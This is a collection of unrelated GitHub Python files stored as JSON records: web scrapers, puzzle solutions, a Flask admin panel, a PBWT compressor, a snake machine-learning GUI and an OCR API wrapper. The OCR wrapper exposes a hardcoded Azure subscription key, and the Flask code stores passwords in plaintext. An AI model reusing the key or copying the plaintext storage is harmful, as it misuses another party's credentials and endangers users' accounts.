make_threads(thread_num, url_queue, save_path):\r\n \"\"\"\r\n makeup threads and scrape contents from assigned url\r\n :param thread_num: threads number\r\n \"\"\"\r\n print(\"makeup threads\")\r\n lock = threading.Lock()\r\n for i in range(thread_num):\r\n print(\"start thread\", i)\r\n thread = threading.Thread(target=assign_filter, args=(url_queue, lock, save_path))\r\n thread.start()\r\n\r\n\r\ndef remove_duplicate_urls(file_path, existing_file_path, filter_file_path):\r\n file = codecs.open(file_path).read().split(\"\\n\")\r\n urls = []\r\n for url in file:\r\n urls.append(url)\r\n\r\n file1 = codecs.open(existing_file_path).read().split(\"\\n\")\r\n exist_urls = []\r\n for url in file1:\r\n exist_urls.append(url)\r\n\r\n urls_filter = set(urls)\r\n urls_exist = set(exist_urls)\r\n final_urls = list(urls_filter - urls_exist)\r\n\r\n filter_file = codecs.open(filter_file_path, 'a', encoding='utf-8')\r\n for url in final_urls:\r\n filter_file.write(url+\"\\n\")\r\n\r\n\r\ndef url_lead(url_file_path):\r\n \"\"\"\r\n read in url list, which is already crawled\r\n :param url_file_path:\r\n :return:\r\n \"\"\"\r\n file = codecs.open(url_file_path).read().split(\"\\n\")\r\n url_queue = Queue.Queue(len(file))\r\n for url in file:\r\n url_queue.put(url)\r\n return url_queue\r\n\r\n\r\ndef main():\r\n max_url_num = 100\r\n start_url = \"https://www.dailymail.co.uk/news/headlines/index.html?previousday=1\"\r\n module_pattern = \"news/article\"\r\n save_path = r\"daily_mail.txt\"\r\n\r\n print(\"convert start url!\")\r\n soup = html_to_bs(start_url)\r\n print(\"crawl start url!\")\r\n spider_list = url_finder(soup, start_url, module_pattern, [])\r\n # print(\"fill url list!\")\r\n # scrape_list = url_fill(spider_list, max_url_num, module_pattern)\r\n print(\"save file!\")\r\n url_save(spider_list, save_path)\r\n\r\n # file_path = r\"\" # waiting for remove repetition\r\n # exist_file_path = r\"\" # existing file path\r\n # filter_file_path = r\"\" # new file without repetition\r\n # remove_duplicate_urls(file_path, exist_file_path, filter_file_path)\r\n#\r\n# exitFlag = 0 # flag for url_queue\r\n# scrape_queue = url_lead(\"url_cnn.txt\")\r\n# print(\"start scrape\")\r\n# make_threads(1, scrape_queue, r\"\")\r\n# # make sure url queue is empty\r\n# while not scrape_queue.empty():\r\n# pass\r\n# exitFlag = 1\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"xiyan524/MM-AVS","sub_path":"webCrawler.py","file_name":"webCrawler.py","file_ext":"py","file_size_in_byte":7559,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"20"} +{"seq_id":"35008671828","text":"n = int(raw_input())\ndic = {}\nfor x in range(n):\n lis = raw_input().split(\" \")\n nom = lis[0]\n num = abs(int(lis[1]))\n\n if num in dic:\n dic.pop(num)\n else:\n dic[num] = nom\nprint(\"FOREVER ALONE ones:\")\nfor x in reversed(dic.keys()):\n print(dic[x])\n","repo_name":"schiob/OnlineJudges","sub_path":"COJ/python/2752.py","file_name":"2752.py","file_ext":"py","file_size_in_byte":278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"17610416257","text":"import copy\r\nimport numpy as np\r\nimport sympy.utilities.iterables as sui\r\nimport io\r\nimport sys\r\n\r\nwith open(\"Input.txt\", \"r\") as f:\r\n\tline = f.readline().split(\",\")\r\n\tprogram = [int(i) for i in line]\r\n\r\ndef getargs(program, p, modes, argc):\r\n\targs = []\r\n\tfor i in range(argc):\r\n\t\targs.append(p+i+1 if len(modes) >= i + 1 and modes[i] == 1 else program[p+i+1])\r\n\treturn args\r\n\r\ndef computer(program, noun=None, verb=None, stdin=sys.stdin, stdout=sys.stdout):\r\n\tif not noun is None:\r\n\t\tprogram[1] = str(noun)\r\n\tif not verb is None:\r\n\t\tprogram[2] = str(verb)\r\n\tp = 0\r\n\tbuffer = []\r\n\twhile True:\r\n\t\topcode = int(str(program[p])[-min(2, len(str(program[p]))):])\r\n\t\tif len(str(program[p])) > 2:\r\n\t\t\tmodepart = str(program[p])[:len(str(program[p]))-2][::-1]\r\n\t\t\tmodes = [int(modepart[i]) for i in range(len(modepart))]\r\n\t\telse:\r\n\t\t\tmodes = []\r\n\t\tif opcode == 1: #Add\r\n\t\t\targs = getargs(program, p, modes, 3)\r\n\t\t\tprogram[args[2]] = program[args[0]] + program[args[1]]\r\n\t\t\tp += 4\r\n\t\telif opcode == 2: #Mult\r\n\t\t\targs = getargs(program, p, modes, 3)\r\n\t\t\tprogram[args[2]] = program[args[0]] * program[args[1]]\r\n\t\t\tp += 4\r\n\t\telif opcode == 3: #Read\r\n\t\t\twhile len(buffer) == 0:\r\n\t\t\t\tinp = stdin.readline()\r\n\t\t\t\tbuffer += [int(i) for i in inp.split(\" \")]\r\n\t\t\targs = getargs(program, p, modes, 1)\r\n\t\t\tprogram[args[0]] = buffer[0]\r\n\t\t\tbuffer = buffer[1:]\r\n\t\t\tp += 2\r\n\t\telif opcode == 4: #Write\r\n\t\t\targs = getargs(program, p, modes, 1)\r\n\t\t\tstdout.write(f\"{program[args[0]]}\\n\")\r\n\t\t\tp += 2\r\n\t\telif opcode == 5: #Jump-if-true\r\n\t\t\targs = getargs(program, p, modes, 2)\r\n\t\t\tif not program[args[0]] == 0:\r\n\t\t\t\tp = program[args[1]]\r\n\t\t\telse:\r\n\t\t\t\tp += 3\r\n\t\telif opcode == 6: #Jump-if-false\r\n\t\t\targs = getargs(program, p, modes, 2)\r\n\t\t\tif program[args[0]] == 0:\r\n\t\t\t\tp = program[args[1]]\r\n\t\t\telse:\r\n\t\t\t\tp += 3\r\n\t\telif opcode == 7: #Less than\r\n\t\t\targs = getargs(program, p, modes, 3)\r\n\t\t\tprogram[args[2]] = 1 if program[args[0]] < program[args[1]] else 0\r\n\t\t\tp += 4\r\n\t\telif opcode == 8: #Equals\r\n\t\t\targs = getargs(program, p, modes, 3)\r\n\t\t\tprogram[args[2]] = 1 if program[args[0]] == program[args[1]] else 0\r\n\t\t\tp += 4\r\n\t\telif opcode == 99: #Exit\r\n\t\t\tbreak\r\n\t\telse:\r\n\t\t\traise RuntimeError(f\"Invalid opcode: {opcode}\")\r\n\treturn program[0]\r\n\r\ndef calcthrust(program, p):\r\n\toutp = 0\r\n\tfor i in p:\r\n\t\tstdin = io.StringIO(f\"{i}\\n{outp}\\n\")\r\n\t\tstdout = io.StringIO(\"\")\r\n\t\tcomputer(copy.copy(program), stdin=stdin, stdout=stdout)\r\n\t\toutp = int(stdout.getvalue())\r\n\treturn outp\r\n\r\nmaxval = 0\r\nfor p in sui.multiset_permutations(np.array([0, 1, 2, 3, 4])):\r\n\tmaxval = max(maxval, calcthrust(program, p))\r\nprint(maxval)","repo_name":"brentmaas/AdventOfCode2019","sub_path":"Day7/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":2583,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"15528409973","text":"# -*- coding: utf-8 -*-\nimport requests\nfrom google.cloud import vision\nimport io\nimport simplejson as json\nfrom google.protobuf.json_format import MessageToJson\n\n\nclass Api_Call:\n def __init__(self, doc_path):\n self.doc_path = doc_path\n self.text_from_Azure_API()\n\n def text_from_Azure_API(self):\n\n # For Azure OCR API.\n\n subscription_key = \"8f6ad67b6c4344779e6148ddc48d96c0\"\n vision_base_url = \"https://madvisor.cognitiveservices.azure.com/vision/v2.0/\"\n text_recognition_url = vision_base_url + \"read/core/asyncBatchAnalyze\"\n\n data = open(self.doc_path, \"rb\").read()\n\n headers = {'Ocp-Apim-Subscription-Key': subscription_key,\n 'Content-Type': 'application/octet-stream'}\n\n response = requests.post(\n text_recognition_url,\n headers=headers,\n data=data)\n response.raise_for_status()\n\n analysis = {}\n poll = True\n while (poll):\n response_final = requests.get(\n response.headers[\"Operation-Location\"], headers=headers)\n analysis = response_final.json()\n # print(analysis)\n if (\"recognitionResults\" in analysis):\n poll = False\n if (\"status\" in analysis and analysis['status'] == 'Failed'):\n poll = False\n\n self.doc_analysis = analysis\n\n def page_wise_response(self, page_number):\n return [i for i in self.doc_analysis[\"recognitionResults\"]\n if (i[\"page\"] == page_number)][0]\n\n\ndef fetch_google_response(path):\n \"\"\"Detects text in the file.\"\"\"\n\n client = vision.ImageAnnotatorClient()\n with io.open(path, 'rb') as image_file:\n content = image_file.read()\n image = vision.types.Image(content=content)\n\n conf_response = client.document_text_detection(image=image)\n conf_response = json.loads(MessageToJson(conf_response))\n\n return conf_response\n\n\ndef fetch_google_response2(path):\n \"\"\"Detects text in the file.\"\"\"\n\n client = vision.ImageAnnotatorClient()\n with io.open(path, 'rb') as image_file:\n content = image_file.read()\n image = vision.types.Image(content=content)\n response = client.text_detection(image=image)\n texts = response.text_annotations\n response = json.loads(MessageToJson(response))\n\n return response\n\n\n\n\n","repo_name":"Srinidhi-SA/mAdvisorProdML","sub_path":"SPARK_DOCKER/code/mAdvisor-api/ocr/ITE/scripts/apis.py","file_name":"apis.py","file_ext":"py","file_size_in_byte":2365,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"71766063729","text":"from bs4 import BeautifulSoup\nimport requests\nimport pandas as pd\n\n\ndef createTrainingData():\n link = \"https://www.hbs.edu/mba/find-answers/Pages/default.aspx\"\n response = requests.get(link)\n soup = BeautifulSoup(response.text, \"html5lib\")\n\n questions = []\n for question in soup.find_all(\"dt\"):\n questions.append(question.get_text())\n\n answers = []\n for answer in soup.find_all(\"dd\"):\n answers.append(answer.get_text())\n\n TrainingData = pd.DataFrame(list(zip(questions, answers)), columns=['Question', 'Answer'])\n\n return TrainingData\n\n\n\n\nTrainingData=createTrainingData()\n","repo_name":"kvaibhav2009/FAQChatbot","sub_path":"FAQChatbot/FAQchatbot/ScrapeForDataset.py","file_name":"ScrapeForDataset.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"70227712690","text":"from flask import (\n Blueprint,\n url_for,\n request,\n redirect,\n render_template,\n flash,\n abort,\n jsonify\n)\n\nfrom flask_login import login_user, logout_user, login_required, current_user\nfrom sqlalchemy import desc, func\nimport json\nfrom config import login_manager, Session\nfrom models import User, Work, Project, Client\nfrom json import dumps\n\nimport datetime\n\nfrom earnings_metric_calculator import EarningsMetricCalculator\nfrom work_hours_metric_calculator import WorkHoursMetricCalculator\n\nadmin_blueprint = Blueprint(\"admin\", __name__)\n\n\n# todo add login setting later\n# todo ensure that there is a check if user is admin or not\n@admin_blueprint.route(\"/users/add\", methods=[\"POST\", \"GET\"])\n@login_required\ndef add_user():\n if not current_user.is_admin:\n return \"Access denied. You are not an admin.\"\n\n if request.method == \"GET\":\n return render_template(\"admin_add_user.html\")\n\n\n try:\n username = request.form[\"username\"]\n password = request.form[\"password1\"]\n first_name = request.form[\"first-name\"]\n last_name = request.form[\"last-name\"]\n email_address = request.form[\"email-address\"]\n is_admin = bool(request.form.get(\"is-admin\"))\n\n except KeyError as e:\n print(e)\n flash(\"At least one input was not filled in\", \"error\")\n return render_template(\"admin_add_user.html\")\n\n\n # check if a user with the inputted username alreadey exits or not\n #TODO don't store passwords literally - store hashed ones\n session = Session()\n existing_user = session.query(User).filter(User.username == username).first()\n\n if existing_user is not None:\n flash(\"There was an existing user with the same username\", \"error\")\n session.close()\n return render_template(\"admin_add_user.html\")\n\n\n session.add(User(username=username,\n password=password,\n first_name=first_name,\n last_name=last_name,\n email_address=email_address,\n is_working=False,\n is_admin=is_admin))\n session.commit()\n session.close()\n flash(\"User added successfully\", \"success\")\n return render_template(\"admin_add_user.html\")\n\n\n@admin_blueprint.route(\"/clients/add\", methods=[\"GET\", \"POST\"])\n@login_required\ndef add_client():\n if not current_user.is_admin:\n return \"Access denied. You are not an admin.\"\n\n if request.method == \"GET\":\n return render_template(\"admin_add_client.html\")\n\n\n try:\n client_name = request.form[\"client-name\"]\n\n except KeyError as e:\n print(e)\n flash(\"At least one input was not filled in\", \"error\")\n return render_template(\"admin_add_user.html\")\n\n\n # add client\n with Session() as session:\n session.add(Client(name=client_name))\n session.commit()\n\n flash(\"Client added successfully\", \"success\")\n return render_template(\"admin_add_client.html\")\n\n\n@admin_blueprint.route(\"/users\")\n@login_required\ndef show_users():\n if not current_user.is_admin:\n return \"Access denied. You are not an admin.\"\n\n # todo: use get_user_profile API\n session = Session()\n users = session.query(User).all()\n user_objects = [user.to_dict_without_password() for user in users]\n return render_template(\"check_users2.html\", users=user_objects)\n\n@admin_blueprint.route(\"/\")\n@login_required\ndef index():\n if not current_user.is_admin:\n return \"Access denied. You are not an admin.\"\n\n\n\n # get year and month of the oldest available data in the database\n\n min_available_year_and_time = get_min_available_year_and_month()\n\n return render_template(\"admin_index.html\",\n min_datetime=dumps(min_available_year_and_time)\n )\n\n@admin_blueprint.route(\"/test\", methods=[\"GET\"])\ndef test():\n return render_template(\"test/test_api.html\")\n\ndef get_min_available_year_and_month():\n with Session() as session:\n min_datetime_record = session.query(Work.start_datetime).order_by().limit(1).first()\n min_available_year_and_time = min_datetime_record[0]\n return min_available_year_and_time.date().isoformat()\n\n\n@admin_blueprint.route(\"/projects\", methods=[\"GET\"])\n@login_required\ndef get_projects():\n # servers a list of projects\n # todo create html for this\n # put an edit button\n pass\n\n@admin_blueprint.route(\"/projects/edit\", methods=[\"POST\", \"GET\"])\n@login_required\ndef edit_project():\n # todo add a page to modify the project (e.g. adding earnings)\n # todo create a project modifying page\n pass\n\n\n@admin_blueprint.route(\"/projects/add\", methods=[\"POST\", \"GET\"])\n@login_required\ndef add_project():\n # authentication\n if not current_user.is_admin:\n return \"Access denied. You are not an admin.\"\n\n # if method == get\n if request.method == \"GET\":\n return render_template(\"admin_add_project.html\")\n\n # input validation\n try:\n manager_id = int(request.form[\"manager-id\"])\n client_id = request.form.get(\"client-id\")\n client_info = (int(client_id) if isinstance(client_id, str) and client_id.isdigit() else client_id) or request.form.get(\"client-name\")\n start_date_raw = request.form[\"start-date\"]\n\n except:\n # print(e)\n flash(\"At least one input was not filled in\", \"error\")\n return render_template(\"admin_add_project.html\")\n\n\n # parse dates\n start_datetime = datetime.datetime.strptime(start_date_raw, \"%Y-%m-%d\")\n\n\n if isinstance(client_info, str):\n # need to create a new client & insert it to the DB\n with Session() as session:\n client = Client(name=client_info)\n session.add(client)\n session.commit()\n\n # get the client id\n client_id = client.id\n\n else:\n client_id = client_info\n\n # add project record\n with Session() as session:\n session.add(Project(client_id=client_id, manager_id=manager_id, start_datetime=start_datetime))\n session.commit()\n\n flash(\"Project added successfully\", \"success\")\n return render_template(\"admin_add_project.html\")\n\n","repo_name":"superleesa/simple_company_management_tool","sub_path":"admin_blueprint.py","file_name":"admin_blueprint.py","file_ext":"py","file_size_in_byte":6167,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"15438152575","text":"from cmath import inf\nimport sys\nfrom tarfile import LENGTH_NAME\nimport numpy\nimport argparse\n\ndef convertXtoInts(X, alphabetDict):\n newX = []\n for x in X:\n str = ''\n for a in x:\n if a in alphabetDict:\n str += alphabetDict[a]\n newX.append(str)\n return newX\n \n\ndef constructReversePrefixSortMatrix(X, alphabet):\n #Creates the Mx(N+1) matrix (A)\n M = len(X)\n N = (0 if len(X) == 0 else len(X[0]))\n A = numpy.empty(shape=[M, 1 if len(X) == 0 else N+1 ], dtype=int) \n\n #Fill in first column of A\n for i in range(M):\n A[i][0] = i\n\n #iterate through columns of A\n for k in range(N):\n a = []\n #create a 2-D list to hold the positions of the sequences after sorting \n for alph in range(len(alphabet)):\n a.append([])\n\n #iterate through indices of column \n for i in A[:,k]:\n \n pos = alphabet.index(X[i][k])\n a[pos].append(i)\n \n '''\n #consider changing this to find index wo iterating \n #iterate through alphabet to sort prefixes\n for alph in range(len(alphabet)):\n #sort prefixes by adding them to the sublists of a\n \n if X[i][k] == alphabet[alph]:\n a[alph].append(i)\n break\n '''\n \n #column k+1 in A is a sublists concatenated \n array = []\n for sub in a:\n array += sub\n\n A[:,k+1] = array\n\n return A\n\n\ndef constructYFromX(X, alphabet):\n #Creates the MxN matrix\n M = len(X)\n N = (0 if len(X) == 0 else len(X[0]))\n Y = numpy.empty(shape=[M, 0 if len(X) == 0 else N ], dtype=int)\n \n #create the A matrix \n A = constructReversePrefixSortMatrix(X, alphabet)\n\n #iterate through i and j of A and construct Y using the function above\n for i in range(M):\n for j in range(N):\n #print(i,j)\n #print(A[i][j])\n #print(Y[i][j])\n #print(X[A[i][j]][j*2:(j*2)+bits])\n\n Y[i][j] = X[A[i][j]][j]\n #print(type(Y[i][j]))\n\n return Y\n\n\n\ndef constructXFromY(Y,alphabet):\n #Creates the MxN matrix\n X = numpy.empty(shape=[len(Y), 0 if len(Y) == 0 else len(Y[0]) ], dtype=int)\n\n #Code to write - you're free to define extra functions\n #(inline or outside of this function) if you like.\n \n #create A\n A = numpy.zeros(shape=[len(X), 1 if len(X) == 0 else len(X[0])+1 ], dtype=int) \n \n M = len(X)\n\n #create first col of A\n for i in range(M):\n A[i][0] = i\n\n #iterate through number of columns in Y\n for k in range(len(Y[0,:])):\n\n #iterate through number of rows in A\n for m in range(len(A[:,0])):\n #use formula from #2 to create column of X from Y\n X[A[m][k]][k] = Y[m][k]\n \n #make next column of A\n a = []\n for alph in range(len(alphabet)):\n a.append([])\n\n\n #a = []\n #b = []\n\n #iterate through # of cols in Y\n for i in range(len(Y[:,k])):\n pos = alphabet.index(str(Y[i][k]))\n a[pos].append(A[i][k])\n #use values in Y to construc A\n \n '''\n if Y[i][k] == 0:\n a.append(A[i][k])\n \n else:\n b.append(A[i][k])\n '''\n\n #Create next col of A \n array = []\n for sub in a:\n array += sub \n A[:,k+1] = array\n \n return list(map(lambda i : \"\".join(map(str, i)), X)) #Convert back to a list of strings\n\ndef runLenEncode(string):\n encoding = \"\" # stores output string\n i = 0\n while i < len(string):\n # count occurrences of character at index `i`\n count = 1\n while i + 1 < len(string) and string[i] == string[i + 1]:\n count = count + 1\n i = i + 1\n # append current character and its count to the result\n encoding += str(count) + string[i]\n i = i + 1\n return encoding\n\ndef compressYMat(Y,conversionAlph):\n compressed=[]\n keys=list(conversionAlph.keys())\n values=list(conversionAlph.values())\n for n in range(Y.shape[1]):\n string=''\n for y in range(len(Y[:,n])):\n string += keys[values.index(str(Y[:,n][y]))]\n compressed.append(runLenEncode(string))\n return compressed\n\n\ndef main():\n print(\"pbwt main\")\n #test code\n X = ['ACG', 'ACC', 'GAC', 'TCG', 'GGT', 'TTT', 'GTT']\n conversionAlph = {'A':'0', 'C':'1', 'G':'2', 'T':'3'}\n #note that alphabet must be a set of integers\n alph = ['0','1', '2', '3']\n\n X = convertXtoInts(X, conversionAlph)\n print(X)\n #test code\n Y = constructYFromX(X, alph)\n # print(Y)\n #test code\n # print(constructXFromY(Y,alph))\n # print(compressYMat(Y,conversionAlph))\n\nif __name__ == '__main__':\n main()\n","repo_name":"amkram/haplotype-compression","sub_path":"pbwt.py","file_name":"pbwt.py","file_ext":"py","file_size_in_byte":4951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"21110490840","text":"from confapp import conf\nimport settings\n\nconf += settings\n\nimport pyforms\nfrom pyforms_gui.basewidget import BaseWidget\nfrom pyforms.controls import ControlButton\nfrom pyforms.controls import ControlText\nfrom pyforms.controls import ControlCheckBox\nfrom pyforms.controls import ControlLabel\n\nfrom genetics import Genetics\n\n\nclass Main(BaseWidget):\n \"\"\"\n parameters:\n selection_rate(0.1)\n mutation_rate(0.01)\n population_size(100)\n random_weight_range(1.0)\n max_generations(100)\n show_graphics(true)\n save_population(false)\n save_best(false)\n save_graph(true)\n \"\"\"\n\n def __init__(self):\n super(Main, self).__init__('Snake Machine Learning')\n self.selection_rate = ControlText(\"Selection Rate (0.001-0.999)\", default=\"0.1\")\n self.mutation_rate = ControlText(\"Mutation Rate (0.001-0.999)\", default=\"0.01\")\n self.population_size = ControlText(\"Population Size (20-1000)\", default=\"100\")\n self.random_weight_range = ControlText(\"Random Weight Range (0.1 - 1.0)\", default=\"1.0\")\n self.max_generations = ControlText(\"Max Generations (1 - ...)\", default=\"100\")\n\n self.show_graphics = ControlCheckBox(\"Show Graphics\", default=True)\n self.games_to_show = ControlText(\"Games to Show\", default=\"25\")\n self.grid_count = ControlText(\"Grid Count\", default=\"30\")\n self.grid_size = ControlText(\"Grid Size\", default=\"5\")\n\n self.save_population = ControlCheckBox(\"Save Population\")\n self.save_best = ControlCheckBox(\"Save Best\")\n self.save_graph = ControlCheckBox(\"Save Graph\", default=True)\n\n self.error = ControlLabel(\"\")\n self.start_button = ControlButton('Start Simulation')\n self.start_button.value = self.start_simulation\n\n self.formset = ['h1:Snake Machine Learning', 'h3:Machine Learning Parameters', 'selection_rate',\n 'mutation_rate',\n 'population_size', 'random_weight_range', 'max_generations',\n 'h3:Graphics Parameters', 'show_graphics', 'games_to_show', 'grid_count', 'grid_size',\n 'h3:Save Parameters', ('save_population', 'save_graph', 'save_best'),\n 'error', 'start_button']\n\n def start_simulation(self):\n print(self.save_population.value)\n if self.check_variables():\n Genetics(replay=False, runId=1, load_pop=False, selection_rate=float(self.selection_rate.value),\n mutation_rate=float(self.mutation_rate.value),\n population_size=int(self.population_size.value),\n random_weight_range=float(self.random_weight_range.value),\n max_generations=int(self.max_generations.value),\n show_graphics=self.show_graphics.value,\n games_to_show=int(self.games_to_show.value),\n grid_count=int(self.grid_count.value),\n grid_size=int(self.grid_size.value),\n save_population=self.save_population.value,\n save_graph=self.save_graph.value,\n save_best=self.save_best.value)\n\n def check_variable(self, name, value, min_value, max_value, variable_type):\n # integer\n if variable_type == 0:\n if self.isInt(value):\n if int(value) < min_value or int(value) > max_value:\n self.show_var_error(name, min_value, max_value, variable_type)\n return False\n else:\n self.show_error(name + \"needs to be an integer\")\n # float\n elif variable_type == 1:\n if self.isFloat(value):\n if float(value) <= min_value or float(value) >= max_value:\n self.show_var_error(name, min_value, max_value, variable_type)\n return False\n else:\n self.show_error(name + \"needs to be a float\")\n else:\n return False\n\n self.show_error(\" \")\n return True\n\n def check_variables(self):\n return (not self.check_variable(\"selection_rate\", self.selection_rate.value, 0, 1, 1)\n and not self.check_variable(\"mutation_rate\", self.mutation_rate.value, 0, 1, 1)\n and not self.check_variable(\"population_size\", self.population_size.value, 20, 1000, 0)\n and not self.check_variable(\"random_weight_range\", self.random_weight_range.value, 0.1, 1.0, 1)\n and not self.check_variable(\"max_generations\", self.max_generations.value, 1, -1, 0)\n and not self.check_variable(\"games_to_show\", self.games_to_show.value, 1, self.population_size.value, 0)\n and not self.check_variable(\"grid_count\", self.grid_count.value, 3, 10000, 0)\n and not self.check_variable(\"grid_size\", self.grid_size.value), 1, 1000, 0)\n\n def show_var_error(self, var, min_value, max_value, variable_type):\n self.show_error(var + \" must be between \" + str(min_value) + \" and \" + str(max_value))\n\n def show_error(self, message):\n self.error.value = message\n\n def isFloat(self, value):\n try:\n float(value)\n return True\n except ValueError:\n return False\n\n def isInt(self, value):\n try:\n int(value)\n return True\n except ValueError:\n return False\n\n\nif __name__ == \"__main__\":\n pyforms.start_app(Main, geometry=(200, 200, 1, 1))\n","repo_name":"will-y/snake","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5504,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"20"} +{"seq_id":"71013663729","text":"N = int(input())\ndata = ''\nfor _ in range(N):\n data += str(input())\n\ndef binary_serch(data,N):\n left = 0\n right = len(data)-1\n while left <= right:\n mid = (left+right)//2\n if data[mid] == '#' and (data[mid+1] == '0' or mid == len(data)-1):\n break\n elif data[mid] == '0':\n right = mid - 1\n else:\n left = mid + 1\n a = mid // N\n b = mid % N\n print(a,b)\n\nbinary_serch(data,N)","repo_name":"hw2ny1/STUDY","sub_path":"minco/LEVEL 5/클라우드 데이터 백업.py","file_name":"클라우드 데이터 백업.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"31868640123","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport csv\nol=[]\nth=[]\ncount1=0\ncount2=0\n#count3=0\n#count4=0\noutput1=[]\noutput2=[]\nper1=[]\nper2=[]\nglobal percentage1\nglobal percentage2\n\ndef wow(count1,count3,count4):\n percentage1=(count3/count1)*100\n print(\"TOTAL PERCENTAGE OL\",percentage1,\"%\")\n per1.append(percentage1)\n percentage2=(count4/count1)*100\n print(\"TOTAL PERCENTAGE TH\",percentage2,\"%\")\n per2.append(percentage2)\n return percentage1,percentage2\nfor col in range(3,60,12):\n cols=col+1\n ol=[]\n th=[]\n fo=open(\"B.csv\",'r')\n plot=csv.reader(fo)\n count1=0\n count3=0\n count4=0\n \n for row in plot:\n ol.append(int(row[col]))\n th.append(int(row[cols]))\n count1=count1+1 \n for i in ol:\n if(i<20):\n count3=count3+1\n print(count3)\n for j in th:\n if(j<20):\n count4=count4+1\n print(count4)\n output1.append(wow(count1,count3,count4))\n #output2.append(wow(count1,count3,count4)) \nprint(per1)\nprint(per2)\n#print(output1)\n#print(output2)\n\n\n#works to display only 2 digits after decimal\nper1 = list(np.around(np.array(per1),2))\nper2 = list(np.around(np.array(per2),2))\n\n\nsubjects=['DM', 'DELD', 'DSA', 'COA', 'OOP']\nlegends=['ONLINE','THEORY']\nlist3=np.arange(len(subjects))\nbarsticks=plt.bar(list3,per1,align='center',alpha=1,width=0.27)\nfor rect in barsticks:\n\theight=rect.get_height()\n\tplt.text(rect.get_x()+rect.get_width()/2,height,'%d'% int(height),ha='center')\nbarsticks=plt.bar(list3+0.27,per2,align='center',alpha=1,width=0.27)\nfor rect in barsticks:\n\theight=rect.get_height()\n\tplt.text(rect.get_x()+rect.get_width()/2,height,'%d'% int(height),ha='center')\n\n\nplt.legend(legends)\nplt.xticks(list3,subjects,ha='left')\nplt.tight_layout()\nplt.title('Visualization of Failed Percentage(Div-B)')\nplt.xlabel('Subjects(ONLINE VS THEORY EXAM)')\nplt.ylabel('Marks in percentage(APPROX)')\nplt.show()\n","repo_name":"Piyush-Awchar/Result_Analysis_in_Python","sub_path":"proj-prog/perofolth.py","file_name":"perofolth.py","file_ext":"py","file_size_in_byte":2091,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"26932724324","text":"#coding=utf-8\nimport pandas as pd\nimport sys, io\n\nsys.stdout = io.TextIOWrapper(sys.stdout.buffer, encoding='utf-8')\n\n# 设置控制台显示宽度\npd.set_option(\"display.width\", 1000)\n\noo = pd.read_csv(\"olympics.csv\",skiprows=4)\n# print(oo.head())\n\n\"\"\"\n1.In which events did Jesse Owens win a medal?,show events he take part in.\n\"\"\"\n# owens = oo[oo.Athlete.str.contains(\"OWENS, Jesse\")]\nowens = oo[oo.Athlete==\"OWENS, Jesse\"]\n# print(owens)\n\n# print(owens.Event.value_counts()) # 统计出Owens 参与的项目\n\n\n\"\"\"\n2.Which country has won men's gold medals in singles badminton over the years? Sort the results alphabetically by the player's names.\n\"\"\"\n\nmbs = oo[(oo.Gender==\"Men\")&(oo.Sport==\"Badminton\")&(oo.Event==\"singles\")&(oo.Medal==\"Gold\")]\n\nmbs1 = mbs.sort_values(by=\"Athlete\")\n# print(mbs1)\n\n\n\"\"\"\n3.Which three countries have won the most medals in recent years (from 1984 to 2008)?\n\"\"\"\nnoc = oo[(oo.Edition>=1984)&(oo.Edition<=2008)]\nmost3 = noc.NOC.value_counts().head(3)\nprint(most3)\n\n\n\"\"\"\n4.Display the male gold medal winners for the 100m sprint event over the years. \nList the results starting with the most recent. \nShow the Olympic City, Edition, Athlete and the country they represent.\n\"\"\"\n\nmgm = oo[(oo.Medal==\"Gold\")&(oo.Gender==\"Men\")&(oo.Event==\"100m\")]\nnew = mgm.sort_values(\"Edition\",ascending=False)[[\"City\",\"Edition\",\"Athlete\",\"NOC\"]]\nprint(new)\n# print(mgm1)\n\n\n\n","repo_name":"smallsharp/mPython","sub_path":"advanced/pandas使用/过关题.py","file_name":"过关题.py","file_ext":"py","file_size_in_byte":1395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"521887202","text":"import param\n\nfrom holoviews.plotting.util import attach_streams\n\nfrom ...core import AdjointLayout, Empty, GridMatrix, GridSpace, HoloMap, NdLayout\nfrom ...core.options import Store\nfrom ...core.util import wrap_tuple\nfrom ...element import Histogram\nfrom ..plot import (\n CallbackPlot,\n DimensionedPlot,\n GenericAdjointLayoutPlot,\n GenericCompositePlot,\n GenericElementPlot,\n GenericLayoutPlot,\n)\nfrom .util import configure_matching_axes_from_dims, figure_grid\n\n\nclass PlotlyPlot(DimensionedPlot, CallbackPlot):\n\n backend = 'plotly'\n\n width = param.Integer(default=400)\n\n height = param.Integer(default=400)\n\n unsupported_geo_style_opts = []\n\n @property\n def state(self):\n \"\"\"\n The plotting state that gets updated via the update method and\n used by the renderer to generate output.\n \"\"\"\n return self.handles['fig']\n\n\n def _trigger_refresh(self, key):\n \"Triggers update to a plot on a refresh event\"\n if self.top_level:\n self.update(key)\n else:\n self.current_key = None\n self.current_frame = None\n\n\n def initialize_plot(self, ranges=None, is_geo=False):\n return self.generate_plot(self.keys[-1], ranges, is_geo=is_geo)\n\n\n def update_frame(self, key, ranges=None, is_geo=False):\n return self.generate_plot(key, ranges, is_geo=is_geo)\n\n\n\nclass LayoutPlot(PlotlyPlot, GenericLayoutPlot):\n\n hspacing = param.Number(default=120, bounds=(0, 